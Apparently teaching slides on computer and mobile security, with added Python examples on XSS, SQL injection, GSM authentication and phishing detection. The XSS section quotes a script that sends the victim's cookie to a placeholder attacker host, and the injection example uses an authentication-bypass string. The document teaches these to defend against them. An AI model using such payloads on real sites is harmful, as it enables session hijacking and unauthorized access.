Security and Communication
Security Concept
Security is the process of preventing and detecting unauthorized use
Prevention measures help you to stop unauthorised users (intruders) from accessing
Detection helps you to determine whether or not someone attempted to break into
There is no system that is absolutely secure; any form of security can be broken.
In order to have a secure system, it is useful to understand:
The mobile vulnerabilities – the loopholes / weaknesses of our mobile or network
The security threats – attacks against computer vulnerabilities
Current threats by mobile malware
For financial gain / loss
Unnecessary calls / SMS / MMS
Send and sell private information
Cause phones to work slowly or crash
Wipe out contact books and other information on the phone
Remote control of the phone
Install “false” applications
Several types of attacks relevant to small devices
Attacks on authentication
Attacks on services
Attacks on protocols
Attacks on authentication: Often called a dictionary attack or password attack, these assaults make repeated attempts to break through authentication barriers by guessing the identification or private information, interpreting the responses, and trying again with a new guess.
Attacks on services: these attacks target known bugs in the implementations of services. The idea is either to crash the service or to put the implementation into some kind of error mode that gives access to other system functions. This is usually done by probing “boundary conditions”: overloading internal buffers or using untested commands. On a small device, a crash can be lethal, bringing the device down to an inoperable state and potentially losing valuable data.
Attacks on protocols: Again, these attacks focus on bugs in protocol implementations. The idea here is to force the device into a state that will accept any command or simply freeze the machine.
Threats and vulnerabilities in wireless networks and handheld devices
All the vulnerabilities that exist in a conventional wired network apply to wireless technologies. Malicious entities may gain unauthorized access to an organization’s computer network through a wireless connection, bypassing any firewall protections.
Sensitive information that is not encrypted and that is transmitted between two wireless devices may be intercepted and disclosed.
Denial of service attacks may be directed at wireless connections or devices.
Sensitive data may be corrupted during improper synchronization.
Malicious entities may be able to violate the privacy of legitimate users and be able to track their movements.
Handheld devices are easily stolen and can reveal sensitive information.
Data may be extracted without detection from improperly configured devices.
Today’s Information Challenge
More than 80% of an enterprise's digitized information resides on individual hard drives and in personal files, and 80% of that data is unstructured, not secured and not backed up.
Individuals hold the key to the knowledge economy, and most of it is lost when they leave the enterprise.
Employees get 50%-75% of their relevant information directly from other people.
Source: Gartner Group/CIBC World Markets
Confidentiality – Ensure privacy of user information and transmission
Integrity – Ensure accuracy of data and data processing
Availability – Maximize functionality and uptime
Trust – Confidence to transact
Security principles
To protect your system against those attacks, information security is also focused on these three areas:
Confidentiality – ensuring that only appropriate access is allowed to data. Confidentiality is accomplished by some form of cryptographic technique. With that, only the intended recipient of a message can make sense of it.
Integrity – ensuring changes on information are made only by authorised people.
Availability – ensuring that required data is accessible.
Internet Security Vulnerabilities
The term vulnerability is applied to a weakness in a system which allows an attacker to violate the integrity of that system. Vulnerabilities may result from software bugs, operating system settings, weak passwords, computer viruses, etc.
Browsers
Browsers provide an environment to run scripts. Un-patched or older versions of Internet Explorer contain multiple vulnerabilities that can lead to memory corruption, spoofing and execution of arbitrary (attacker-chosen) scripts or code.
Remote code can be executed without any user interaction when a user visits a malicious web page or reads a malicious/harmful email.
With the explosion of rich content in web sites, the use of Browser Helper Objects and third-party plug-ins has increased to access various MIME file types such as multimedia and documents. Plug-ins that support client-side scripting (such as Flash and Shockwave) enable access to third-party file formats.
Many of the plug-ins are installed (semi-)transparently by a website without the user’s awareness. The additional plug-ins introduce more avenues for hackers to exploit to compromise the computers of users visiting malicious web sites.
Operating Systems
The operating system is the foundation on which online applications are built.
Weaknesses in the operating system can be used to compromise security in the server regardless of security settings of applications.
Key vulnerabilities in an OS include:
Insecure default settings – basic configuration and account settings
Web server flaws – HTTP GET method and other bugs
CGI script flaws – mishandling of malicious input
Denial of Service – can’t respond to too many requests
Weak Authentication – using default password, weak password or no password
Software holes – buffer overruns, registry
Server settings
Ecommerce servers typically include front-end web servers and connections to back-end databases.
Software flaws in any of the ecommerce servers represent a serious security vulnerability in the system.
The error messages displayed by MS SQL Server allow attackers to find out information about the database.
Data stored on the server is usually not encrypted.
Many servers keep a large number of ports open.
Not having a backup, or having an incomplete backup, would prevent recovery from an attack.
No filtering of packets results in no verification of the legitimacy of the addresses of packets coming in and out of your network.
Not keeping regular network logs impairs the ability to analyse network traffic, especially to tell if an attack such as DoS is launched.
Software / Web Applications Bugs
Software flaws in any of the ecommerce servers represent a serious security vulnerability in the system.
The programmer may leave an exploitable bug in software which allows an attacker to misuse an application, for example by bypassing access control checks or executing commands on the system hosting the application.
Failure to check the size of data buffers, which can then be overflowed, causes corruption of the stack or heap areas of memory, including causing the computer to execute code provided by the attacker.
The error messages provided by the programmer based upon different inputs supply useful information for attackers. The common attack occurs in the login function.
Network Channels
The Internet is an insecure channel for sending messages.
Transmission over the Internet can be interrupted easily by people with bad intentions.
Communication devices such as routers, gateways or switches are common attack targets.
Threats / Attacks
Cross-site Scripting (XSS)
XSS flaws occur whenever an application takes data that originated from a user and sends it to a web browser without first validating or encoding that content.
XSS allows attackers to execute script in the victim’s browser, which can hijack the user’s session, deface web sites, insert hostile content, conduct phishing attacks (commit fraud to get financial info), and take over the user’s browser using scripting malware. The popular malicious scripting technologies are JavaScript, VBScript, ActiveX and Flash.
The following is a sample of XSS:
<script>document.location='http://attackherhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
The script sends the user’s cookie to the attacker’s host.
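An added example (not from the original slides) showing the flaw and the fix side by side in Python: the same page is rendered with the slide's cookie-stealing script as user input, once reflected raw and once HTML-encoded, together with the allow-list validation and a check a test suite can run. The page template, the name allow-list and the helper names are assumptions made for this example.

```python
import html
import re

# Constructed sample input: the cookie-stealing script quoted on the slide,
# arriving as if it were a user-supplied "name" parameter.
UNTRUSTED_NAME = ("<script>document.location='http://attackherhost.example/"
                  "cgi-bin/cookiesteal.cgi?'+document.cookie</script>")

PAGE_TEMPLATE = "<html><body><h1>Hello, {name}</h1></body></html>"

# Allow-list for a display name (assumed policy: letters, digits, space, . ' -).
NAME_PATTERN = re.compile(r"[A-Za-z0-9 .'\-]{1,64}")
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def is_valid_name(name: str) -> bool:
    """Input validation: reject anything outside the allow-list."""
    return NAME_PATTERN.fullmatch(name) is not None


def render_unsafe(name: str) -> str:
    """The XSS flaw: user data is sent to the browser without validation or encoding."""
    return PAGE_TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Encodes the data for an HTML text context before reflecting it.

    html.escape turns < > & " ' into entities, so the browser shows the payload
    as text instead of parsing a <script> element.  Encoding is context-specific:
    data placed inside an attribute, a URL or a script block needs that
    context's encoding instead of plain HTML entity encoding.
    """
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True))


def contains_live_script(page: str) -> bool:
    """Check usable in a test suite: does the rendered page contain a real
    <script> element?  The escaped form &lt;script does not match."""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    print("input passes allow-list:", is_valid_name(UNTRUSTED_NAME))
    print("unsafe page has script: ", contains_live_script(render_unsafe(UNTRUSTED_NAME)))
    print("safe page has script:   ", contains_live_script(render_safe(UNTRUSTED_NAME)))
```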
Injection Flaws
There are many types of injection: SQL, LDAP, XPath, XSLT, HTML, XML, OS command, etc. XSS is a kind of injection flaw.
Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. Attackers trick the interpreter into executing unintended commands by supplying specially crafted data.
Injection flaws allow attackers to create, read, update or delete any data available to the application. In the worst case, these flaws allow an attacker to completely compromise the application and the underlying system, even bypassing a deeply nested firewalled environment.
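Added example, not from the original slides: a login query built by string concatenation beside the parameterized form that the mitigation section later recommends, run against a constructed sqlite3 table; it also shows the generic error response the slides advise. The table, the function names and the crafted input are constructed for this example.

```python
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the application's database.
    Passwords are stored in clear here only to keep the injection point visible;
    a real application stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The injection flaw: user data is concatenated into the SQL command, so the
    interpreter cannot tell data from command.  Returns the matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Hardened form: a parameterized query.  The driver passes the values
    separately from the command text, so quotes inside the data stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def login_response(conn: sqlite3.Connection, username: str, password: str) -> dict:
    """Wraps the safe login so that database errors never reach the client: the
    caller sees the same generic message whether the user, the password or the
    query failed (the detailed error belongs in a server-side log instead)."""
    try:
        user = login_parameterized(conn, username, password)
    except sqlite3.Error:
        user = None
    if user is None:
        return {"ok": False, "message": "Invalid username or password"}
    return {"ok": True, "user": user}


# Constructed crafted input: the leading quote closes the password literal and
# the OR clause makes the WHERE condition true for every row.
CRAFTED_PASSWORD = "' OR '1'='1"

if __name__ == "__main__":
    db = build_sample_db()
    print("vulnerable login:    ", login_vulnerable(db, "alice", CRAFTED_PASSWORD))
    print("parameterized login: ", login_parameterized(db, "alice", CRAFTED_PASSWORD))
    print("client response:     ", login_response(db, "alice", CRAFTED_PASSWORD))
```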
Buffer overflow
Buffer overflow or buffer overrun refers to a condition where a process attempts to store data beyond the boundaries of a fixed-length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data, and may result in erratic program behaviour, memory access exceptions, program termination, incorrect results or a breach of system security.
Malicious File Execution
Malicious file execution vulnerabilities are found in many applications.
This allows attackers to perform:
Remote code execution
Remote rootkit installation and complete system compromise
On Windows, internal system compromise may be possible through the use of PHP’s SMB file wrappers
Trojan horse programs
Trojan horse programs are a common way for intruders to trick you (sometimes referred to as "social engineering") into installing "back door" programs.
These can allow intruders easy access to your computer without your knowledge, change your system configurations, or infect your computer with a computer virus.
E.g.: BackOrifice, NetBus, and SubSeven.
Email spoofing
Email spoofing is when an email message appears to have originated from one source when it actually was sent from another source.
It is often an attempt to trick the user into making a damaging statement or releasing sensitive information (such as passwords).
Denial-of-Service (DoS)
A DoS attack is an attack that causes your computer to crash or to become so busy processing data that you are unable to use it.
Unprotected Windows shares
Unprotected Windows shares can be exploited by intruders in an automated way to place tools on large numbers of Windows-based computers attached to the Internet.
Because site security on the Internet is interdependent, a compromised computer not only creates problems for the computer's owner, but it is also a threat to other sites on the Internet.
Chat clients
Chat clients provide a mechanism for information to be transmitted bi-directionally between computers on the Internet.
They provide groups of individuals with the means to exchange dialog, web URLs, and in many cases, files of any type.
Because many chat clients allow for the exchange of executable code, they present risks similar to those of email clients.
Packet sniffing
A packet sniffer is a program that captures data from information packets as they travel over the network.
That data may include user names, passwords, and proprietary information that travel over the network in clear text.
Dictionary or Brute Force Attack
Programs that are used to defeat a cryptographic system by trying to determine its decryption key.
They try every possible code or combination until they find the right one. It requires a long time to get to the correct guess, but eventually they will reach the answer.
The common one is to crack the passwords used by users.
Handset Security Issues (1)
People store a wealth of information on their handsets and don’t think about securing them!
Incoming, outgoing, missed calls
SMS (text) and MMS messages
E-mail
Instant-messaging (IM) logs
Multimedia, e.g., pictures, music, videos
Personal calendars
Address books
Clearly, handset security is a vitally important challenge
Handset Malware History (1)
Hackers are already attacking handsets
Most well-known case: a 17-year-old broke into Paris Hilton’s Sidekick handset
Less well-known: worms, viruses, and Trojans have targeted handsets since 2004
2004: Cabir worm released by “29A,” targets Symbian phones via Bluetooth
Duts virus, released by same group, targets Windows Mobile phones
Brador Trojan released by same group, opens backdoor on Windows Mobile
Case Study – CABIR
First mobile worm
Only as Proof-Of-Concept
Spread vector – Bluetooth
Infected file – caribe.sis
15 new variants exist
Case Study - ComWar
Second landmark in mobile worms
Spread vector – Bluetooth and MMS
Large spread area due to MMS
Not as proof of concept – intention to harm by charging the mobile user
Multiple variants detected
Case Study - CardTrap
First cross-over mobile virus found
Can migrate from mobile to PC
Propagates as an infected mobile application as well as a Windows worm
2 variants found – Both install with legitimate applications – Black Symbian and Camcorder Pro
Handset Malware History (2)
2005: CommWarrior worm released; replicates via Bluetooth, MMS messages to all contacts in address book
Doomboot Trojan released; claims to be “Doom 2” video game, installs Cabir and CommWarrior
2006: RedBrowser Trojan released; claims to be a Java program, secretly sends premium-rate SMS messages to a Russian phone number
FlexiSpy spyware released; sends log of phone calls, copies of SMS/MMS messages to Internet server for third party to view
2008: First iPhone Trojan released
Of course, other mobile malware has been released; some malware completely disables the handset
There is also the possibility of mobile botnets
Android.Pjapps – Risk Level 1: Very Low
Android.Pjapps is a Trojan horse that has been embedded on third party applications and opens a back door on the compromised device. It retrieves commands from a remote command and control server.
Discovered: February 22, 2011
The images below show the installation process of a clean Steam Window application and a malicious one.
When the Trojan is executed, it requests permissions to perform the following actions:
Open network sockets
Send and monitor incoming SMS messages
Read and write to the user's browsing history and bookmarks
Install packages
Write to external storage
Read the phone's state (i.e. out of service, radio off, etc.)
Android.Pjapps - Removal
Discovered: February 22, 2011
Updated: February 23, 2011 3:45:36 AM
Type: Trojan
Open the Google Android Menu. Go to the Settings icon and select Applications. Next, click Manage. Select the application and click the Uninstall button.
Key Handset Security Problems
“At this point, mobile device capability is far ahead of security.” – Prof. Patrick Traynor, Georgia Tech (emphasis added)
Handset information can be stolen
Transient information: Enhanced 911 can provide user location information
Static information: “BlueSnarfing” attacks (connection without owner’s knowledge), cracking Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA)
Theft of service attacks, e.g., premium-rate calls/SMS messages
Denial-of-service attacks
Flooding attacks overload the handset radio with garbage
Power-draining attacks attempt to drain the battery
Botnets and DoS attacks against networks are likely in the future
Cybercriminals make 10× as much as security researchers!
Jailbroken iPhones and Upgrades
When a jailbroken iPhone gets an OS upgrade, the jailbreak gets reversed and would typically need to be redone.
This may cause some users of jailbroken iPhones to be reluctant to apply upgrades (even upgrades with critical security patches!) until the newly released version of iOS also gets jailbroken.
That’s obviously a security issue and cause for concern.
Greenpois0n for iOS 4.2.1
But Beware Fake Jailbreaking Apps
And When You Do Get Successfully Jailbroken
If you do successfully jailbreak your iPhone (with an app that’s not malicious in and of itself!), your exposure to OTHER malware will increase.
Some of the malware which has targeted jailbroken iPhones has targeted unchanged OpenSSH passwords for the root and/or mobile accounts (which defaulted to “alpine”):
-- the “ikee” worm (aka “RickRolling” worm)
-- the “Duh” worm (which changed “alpine” to “ohshit”, scanned for other vulnerable iPhones, and stole data)
-- the "iPhone/Privacy.A” (stole data/opened a backdoor)
The “ikee” Worm
The “Duh” Worm
Mobile Malware May Exploit Vulnerable Apps
For example, just as Adobe Reader has been a popular target for malware on traditional desktop and laptop computers, Adobe Reader is also a popular attack vector on handheld mobile devices.
PDF Vulnerabilities on the iPhone
mygadgetnews.com/2010/10/03/pdf-vulnerability-being-used-for-malicious-purposes-on-iphone-ios/
App Vetting and Third Party App Sources
While regular iPhones usually get apps from the iTunes App Store, jailbroken phones can get apps from third-party repositories such as Cydia.
It is unclear how much vetting new apps get before being listed at Cydia.
The problem of rogue applications is not unique to just the iPhone…
A Sample Malicious Android Application
Threats to Network Operator
GSM is not immune to interception. It is possible for the network to order the MS to switch encryption on and off at times of high loading. This signal can be spoofed using a man-in-the-middle attack.
Parties: Operator BTS, Man-in-the-middle (spoofing the BTS towards the subscriber and spoofing the MS towards the operator), Legitimate Subscriber
1. Attempt to register using encryption
2. Passes on the registration request
3. Authenticates
4. Passes on authentication
5. Dials a number
6. Requests MS switch off encryption
7. Encrypts then passes on the call request
8. Call proceeds with MITM eavesdropping
GSM Security Operation
GSM networks utilize cryptography for three purposes:
Authentication
Encryption
Key generation
GSM Security Operation (Cont..)
GSM provides authentication of users and encryption of the traffic across the air interface.
This is accomplished by giving the user and the network a shared secret, called Ki. This 128-bit number is stored on the SIM card and is not directly accessible to the user.
Each time the mobile connects to the network, the network authenticates the user by sending a random number (challenge) to the mobile.
The SIM then uses an authentication algorithm to compute an authentication token SRES using the random number and Ki.
GSM Security Operation (Cont..)
The mobile sends the SRES back to the network which compares the value with an independently computed SRES.
At the same time, an encryption key Kc is computed. This key is used for encryption of subsequent traffic across the air interface.
Thus, even if an attacker listening to the air traffic could crack the encryption key Kc, the attack would be of little value, since this key changes each time the authentication procedure is performed.
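The challenge-response exchange described above, as an added example that is not part of the original slides. The slides do not give GSM's A3/A8 algorithms (they are operator-specific), so HMAC-SHA256 stands in for them; the IMSI, Ki and class names are constructed for this example.

```python
import hashlib
import hmac
import secrets

# A3/A8 stand-ins (assumption): HMAC-SHA256 keyed with Ki, truncated to the
# GSM sizes (32-bit SRES, 64-bit Kc).  Only the protocol flow is the slides'.


def a3_sres(ki: bytes, rand: bytes) -> bytes:
    """A3 stand-in: the 32-bit signed response SRES computed from Ki and RAND."""
    return hmac.new(ki, b"A3" + rand, hashlib.sha256).digest()[:4]


def a8_kc(ki: bytes, rand: bytes) -> bytes:
    """A8 stand-in: the 64-bit ciphering key Kc computed from Ki and the same RAND."""
    return hmac.new(ki, b"A8" + rand, hashlib.sha256).digest()[:8]


class Sim:
    """Models the SIM card: Ki stays inside; only SRES is ever sent out."""

    def __init__(self, ki: bytes):
        self._ki = ki

    def respond(self, rand: bytes):
        """Answer a challenge: return (SRES to send, Kc kept for ciphering)."""
        return a3_sres(self._ki, rand), a8_kc(self._ki, rand)


class Network:
    """Models the operator side: holds each subscriber's Ki and checks SRES."""

    def __init__(self, subscribers):
        self._keys = dict(subscribers)  # IMSI -> Ki

    def challenge(self) -> bytes:
        return secrets.token_bytes(16)  # fresh 128-bit RAND per authentication

    def verify(self, imsi: str, rand: bytes, sres: bytes):
        """Return the session key Kc on success, None if SRES does not match."""
        ki = self._keys.get(imsi)
        if ki is None or not hmac.compare_digest(a3_sres(ki, rand), sres):
            return None
        return a8_kc(ki, rand)


def authenticate(network: Network, imsi: str, sim: Sim):
    """One run of the air-interface exchange: RAND out, SRES back, Kc on both sides."""
    rand = network.challenge()
    sres, kc_sim = sim.respond(rand)
    kc_net = network.verify(imsi, rand, sres)
    return kc_net is not None and kc_net == kc_sim, rand, sres, kc_sim


# Constructed sample subscriber (values are not real)
IMSI = "001010123456789"
KI = bytes.fromhex("00112233445566778899aabbccddeeff")  # 128-bit Ki

if __name__ == "__main__":
    net, sim = Network({IMSI: KI}), Sim(KI)
    ok, rand, sres, kc = authenticate(net, IMSI, sim)
    print("authenticated:", ok, "Kc:", kc.hex())
    # An eavesdropper who captured SRES cannot replay it against a new RAND.
    print("replay accepted:", net.verify(IMSI, net.challenge(), sres) is not None)
```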
Mitigation Strategies
Handset manufacturers, OS & software vendors, and researchers have worked to counter threats
Symbian OS requires apps to be cryptographically signed in order for them to run without user approval
Some handset manufacturers have joined the Trusted Computing Group (TCG) and added hardware to thwart malware tampering with the device
The iPhone runs each application in a “sandbox” to prevent malware from running on the device
Heterogeneous handset OSes make massive malware outbreaks difficult
Vendors like McAfee, Symantec, and Trend Micro sell security software for handsets; F-Secure has bundled its software with Hong Kong provider CSL’s handsets
Researchers have worked on modeling malware propagation on networks, detecting power-draining attacks, etc.
Methods/Techniques to Secure your Data / System
Protection from injection flaws:
Use appropriate input validation
Use strongly typed parameterized query APIs
Enforce least privilege
Avoid detailed error messages
Do not use simple escaping functions
Disable scripting features in browser and email programs
Use virus protection software
Don't open unknown email attachments or run programs of unknown origin
Use good password and change password frequently
Turn off unnecessary services and ports running on server
Use firewall
Use Virtual Private Network (VPN)
Use encryption
Turn off your computer or disconnect from the network when not in use
Keep all applications, including your operating system, patched
Make regular backups of critical data
Make a boot disk in case your computer is damaged or compromised
Have a security policy
8 Steps to Secure Your Computer
Required
1. Safely Install Your Computer’s Operating System
2. Keep Your Operating System Up To Date
3. Install and Update Anti-Virus Software
4. Use Strong Passwords
Strongly Recommended
5. Enable Firewall Protection
6. Install and Use Spyware Removal Tools
7. Back Up Important Files
8. Enable Screen Saver Passwords
What is Defense in Depth
A "Defense in Depth" Strategy employs multiple layers of protection between the control system and the outside world (potential attackers).
Defense in Depth using a layered approach:
Increases an attacker’s risk of detection
Reduces an attacker’s chance of success
Policies, Procedures, & Awareness – User education against social engineering
Physical Security – Guards, locks, tracking devices, HSM
Perimeter – Firewalls, VPN quarantine
Internal Network – Network segments, IPSec, NIDS
Host – OS hardening, update management, authentication
Application – Application hardening, antivirus
Data – ACL, encryption
The Identity Lifecycle
New User – User ID creation, credential issuance, access rights
Account Changes – Promotions, transfers, new privileges, attribute changes
Password Mgmt – Strong passwords, “lost” password, password reset
Retire User – Delete/freeze accounts, delete/freeze entitlements
Architecture
Security Risk Analysis
A simplified approach, taking into account your assets exposure to security risks
Requires:
1. Identifying your assets
2. Assessing risks and their impact, probability and exposure
3. Formulating plans to reduce overall risk exposure
Threat Modeling
Structured analysis aimed at:
Finding infrastructure vulnerabilities
Evaluating security threats
Identifying countermeasures
Originated from software development security threat analysis
1. Identify Assets
2. Create an Architecture Overview
3. Decompose the System
4. Identify the Threats
5. Document the Threats
6. Rate the Threats
Email Safety Tips
1. Do not open unexpected attachments.
2. Use Spam Filters
3. Beware of Spoof Emails or Phishing.
4. Don’t send sensitive data in email.
5. Avoid clicking on links in the body of an email message.
While these links may not be a phishing attempt, they may not go to the site you intend. Unless you are completely comfortable that the email is legitimate, it is best to copy and paste the link or type it in directly in your browser.
Managing Spam Email
Spam is often more of an annoyance than a security risk. However, many email viruses are sent as spam and can be caught by spam filters.
Spoof Email (Phishing)
6 Ways to Recognize Phishing
1. Generic Greeting – For example, “Dear Customer”.
2. Sense of urgency – May include an urgent warning requiring immediate action.
3. Account status threat – May include a warning that your account will be terminated unless you reply.
4. Forged email address – The sender’s email address may be forged, even if it looks legitimate.
5. Forged links to Web sites – There is often a link to a Website to “fix” the problem. These are usually forged.
6. Requests for personal information – Asking for login and password info, either in email or via the link.
Phishing emails are an attempt by thieves to lure you into divulging personal and financial information, for their profit. They pretend to be from well-known legitimate businesses, and increasingly look as if they actually are. They use clever techniques to induce a sense of urgency on your part so that you don't stop to think about whether they are legitimate or not. You can learn to know what to look for and where to report these scams when you find them.
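An added example, not from the original slides, that checks a message against the six signs listed above and reports which are present. The phrase lists, the sample messages and the helper names are constructed assumptions, and the sender-address check can only compare the From: domain with the organisation the mail claims to be from, since a forged address cannot be proven from the message text alone.

```python
import re
from urllib.parse import urlparse

# Phrase lists are assumptions chosen to illustrate the six signs on the slide.
GENERIC_GREETINGS = ("dear customer", "dear user", "dear member", "dear account holder")
URGENCY_WORDS = ("immediately", "urgent", "within 24 hours", "right away")
ACCOUNT_THREATS = ("suspended", "terminated", "locked", "closed")
CREDENTIAL_REQUESTS = ("password", "login", "pin", "social security")

ANCHOR = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
HOST_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)


def _mentions(text: str, phrases) -> bool:
    """Whole-word match so that e.g. 'pin' does not fire on 'shopping'."""
    return any(re.search(r"\b" + re.escape(p) + r"\b", text) for p in phrases)


def forged_links(body_html: str) -> list:
    """Links whose visible text names one host while the href goes to another."""
    out = []
    for href, text in ANCHOR.findall(body_html):
        href_host = (urlparse(href).hostname or "").lower()
        m = HOST_IN_TEXT.search(text)
        if m and m.group(1).lower() != href_host:
            out.append((text.strip(), href))
    return out


def phishing_indicators(from_addr: str, claimed_domain: str,
                        body_text: str, body_html: str = "") -> list:
    """Return which of the slide's six signs are present in a message."""
    text = body_text.lower()
    found = []
    if any(text.lstrip().startswith(g) for g in GENERIC_GREETINGS):
        found.append("generic greeting")
    if _mentions(text, URGENCY_WORDS):
        found.append("sense of urgency")
    if _mentions(text, ACCOUNT_THREATS):
        found.append("account status threat")
    # A From: address cannot be verified from the message text alone; this only
    # checks whether it belongs to the organisation the mail claims to be from.
    sender_domain = from_addr.rsplit("@", 1)[-1].lower()
    claimed = claimed_domain.lower()
    if sender_domain != claimed and not sender_domain.endswith("." + claimed):
        found.append("forged or mismatched sender address")
    if forged_links(body_html):
        found.append("forged link")
    if _mentions(text, CREDENTIAL_REQUESTS):
        found.append("request for personal information")
    return found


# Constructed sample messages (addresses, domains and the IP are invented)
CLAIMED_DOMAIN = "example-bank.com"
PHISH_FROM = "security@example-bank-alerts.net"
PHISH_TEXT = ("Dear Customer,\n\nYour account will be suspended within 24 hours unless "
              "you confirm your login and password at the link below.")
PHISH_HTML = ('<p>Dear Customer,</p><a href="http://203.0.113.5/verify">'
              "https://www.example-bank.com/login</a>")
LEGIT_FROM = "statements@example-bank.com"
LEGIT_TEXT = "Hello Alice,\n\nYour monthly statement is now available in online banking."
LEGIT_HTML = '<a href="https://www.example-bank.com/statements">online banking</a>'

if __name__ == "__main__":
    print("phish:", phishing_indicators(PHISH_FROM, CLAIMED_DOMAIN, PHISH_TEXT, PHISH_HTML))
    print("legit:", phishing_indicators(LEGIT_FROM, CLAIMED_DOMAIN, LEGIT_TEXT, LEGIT_HTML))
```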
Don’t Send Sensitive Data in Email
The Risks of Sending Sensitive Data in Email
1. Sending email is insecure.
2. You are storing sensitive data on your computer.
3. You no longer control the sensitive data.
4. The sensitive data may be sent to others without your knowledge.
Alternatives to Sending Sensitive Data in Email
Faculty, Staff, and Grad Students can use their WebFiles account. You can then share the information by using permissions or tickets.
Although it's convenient to send colleagues sensitive data in email, it is unsafe. Not only is email an insecure way of sending information, you've lost control over that information once you hit the send button.
Mobile security tips
Here’s what you can do to protect yourself now:
Be alert. Don’t leave your handheld lying out on a café table or in an outside pocket of your purse or backpack. Don’t carry it in a jacket or any other place where a pickpocket could easily snatch it.
Password-protect your handhelds. Use strong passwords and PINs to make it difficult for thieves to access them. Consider using a third-party “padlock” program to give yourself extra protection.
Make backups. Just as you would for your PC or Mac, set up a regular backup schedule for the information on your mobile devices.
Limit the amount of confidential data you carry on your handhelds. Use memory sticks or another removable medium to store sensitive information.
Encrypt your most important files. A number of third-party software programs give you the ability to encrypt handheld data.
Protect your handhelds with security software. Norton Smartphone Security protects your smart phone from viruses and intruders.
Use secure wireless connections. If you can’t find one, save important transmissions until you can connect to a secure environment.
Disable Bluetooth and wireless signals when they’re not in use.
Use the same savvy surfing habits you do when connected over a land line. That means verifying the authenticity of email attachments, downloads, and Web sites.
Kaspersky Mobile Security
Locate a lost or stolen smartphone
Secure contacts, photos and files from unauthorized access
Privacy Protection – for your eyes only
Block unwanted calls or SMSs
Parental control
Protect your smart phone from malware and network attacks
More info: http://www.kaspersky.com/kaspersky_mobile_security
Security risk assessment
The following table lists the areas that are included in the security risk assessment:
Infrastructure
Applications
Operations
People